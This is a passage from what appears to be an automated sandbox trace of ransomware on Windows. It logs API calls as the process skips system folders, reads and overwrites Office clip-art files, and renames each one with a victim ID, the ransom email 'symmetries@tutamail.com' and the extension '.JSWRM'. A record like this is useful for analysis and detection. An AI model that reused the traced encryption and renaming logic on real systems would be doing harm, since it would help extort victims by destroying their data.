lpString2="msocache") returned -1 [0083.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0083.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152556.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152556.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152556.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0083.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0083.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152556.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152556.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152556.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0083.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0083.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0083.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0083.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152556.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.946] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16432) returned 1 [0083.946] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4030) returned 0x24d210 [0083.946] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4030, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4030, lpOverlapped=0x0) returned 1 [0083.961] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.961] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4030, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4030, lpOverlapped=0x0) returned 1 [0083.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.961] CloseHandle (hObject=0x314) returned 1 [0083.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0083.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0083.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0083.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0083.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0083.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0083.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0083.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0083.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0083.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0083.962] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152556.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152556.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0083.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0083.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0083.962] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe867602, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3eb4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152558.WMF", cAlternateFileName="")) returned 1 [0083.962] lstrcmpiW (lpString1="J0152558.WMF", lpString2=".") returned 1 [0083.963] lstrcmpiW (lpString1="J0152558.WMF", lpString2="..") returned 1 [0083.963] lstrcmpiW (lpString1="J0152558.WMF", lpString2="...") returned 1 [0083.963] lstrcmpiW (lpString1="J0152558.WMF", lpString2="windows") returned -1 [0083.963] lstrcmpiW (lpString1="J0152558.WMF", lpString2="recovery") returned -1 [0083.963] lstrcmpiW (lpString1="J0152558.WMF", lpString2="perflogs") returned -1 [0083.963] lstrcmpiW (lpString1="J0152558.WMF", lpString2="documents and settings") returned 1 [0083.963] lstrcmpiW (lpString1="J0152558.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.963] lstrcmpiW (lpString1="J0152558.WMF", lpString2="system volume information") returned -1 [0083.963] lstrcmpiW (lpString1="J0152558.WMF", lpString2="msocache") returned -1 [0083.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0083.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152558.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152558.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152558.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0083.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0083.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152558.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152558.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152558.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0083.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0083.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0083.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0083.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152558.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.964] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16052) returned 1 [0083.964] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3eb0) returned 0x24d210 [0083.964] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3eb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3eb0, lpOverlapped=0x0) returned 1 [0083.967] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.967] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3eb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3eb0, lpOverlapped=0x0) returned 1 [0083.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.968] CloseHandle (hObject=0x314) returned 1 [0083.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0083.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0083.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0083.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0083.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0083.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0083.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.968] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152558.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152558.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0083.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0083.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0083.972] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a80, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152560.WMF", cAlternateFileName="")) returned 1 [0083.972] lstrcmpiW (lpString1="J0152560.WMF", lpString2=".") returned 1 [0083.972] lstrcmpiW (lpString1="J0152560.WMF", lpString2="..") returned 1 [0083.972] lstrcmpiW (lpString1="J0152560.WMF", lpString2="...") returned 1 [0083.972] lstrcmpiW (lpString1="J0152560.WMF", lpString2="windows") returned -1 [0083.972] lstrcmpiW (lpString1="J0152560.WMF", lpString2="recovery") returned -1 [0083.973] lstrcmpiW (lpString1="J0152560.WMF", lpString2="perflogs") returned -1 [0083.973] lstrcmpiW (lpString1="J0152560.WMF", lpString2="documents and settings") returned 1 [0083.973] lstrcmpiW (lpString1="J0152560.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.973] lstrcmpiW (lpString1="J0152560.WMF", lpString2="system volume information") returned -1 [0083.973] lstrcmpiW (lpString1="J0152560.WMF", lpString2="msocache") returned -1 [0083.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0083.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152560.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152560.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152560.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0083.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0083.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152560.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152560.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152560.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0083.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0083.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0083.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0083.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152560.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.973] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10880) returned 1 [0083.973] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a80) returned 0x24d210 [0083.974] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2a80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2a80, lpOverlapped=0x0) returned 1 [0083.989] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.989] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2a80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2a80, lpOverlapped=0x0) returned 1 [0083.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.989] CloseHandle (hObject=0x314) returned 1 [0083.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0083.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0083.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0083.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0083.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0083.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0083.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0083.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0083.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.990] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152560.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152560.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0083.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0083.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0083.990] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe867602, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe867602, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe88d87c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe70, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152568.WMF", cAlternateFileName="")) returned 1 [0083.990] lstrcmpiW (lpString1="J0152568.WMF", lpString2=".") returned 1 [0083.990] lstrcmpiW (lpString1="J0152568.WMF", lpString2="..") returned 1 [0083.990] lstrcmpiW (lpString1="J0152568.WMF", lpString2="...") returned 1 [0083.990] lstrcmpiW (lpString1="J0152568.WMF", lpString2="windows") returned -1 [0083.990] lstrcmpiW (lpString1="J0152568.WMF", lpString2="recovery") returned -1 [0083.990] lstrcmpiW (lpString1="J0152568.WMF", lpString2="perflogs") returned -1 [0083.991] lstrcmpiW (lpString1="J0152568.WMF", lpString2="documents and settings") returned 1 [0083.991] lstrcmpiW (lpString1="J0152568.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.991] lstrcmpiW (lpString1="J0152568.WMF", lpString2="system volume information") returned -1 [0083.991] lstrcmpiW (lpString1="J0152568.WMF", lpString2="msocache") returned -1 [0083.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0083.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152568.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152568.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152568.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.991] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0083.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0083.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152568.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152568.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152568.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.991] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0083.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0083.991] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0083.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, 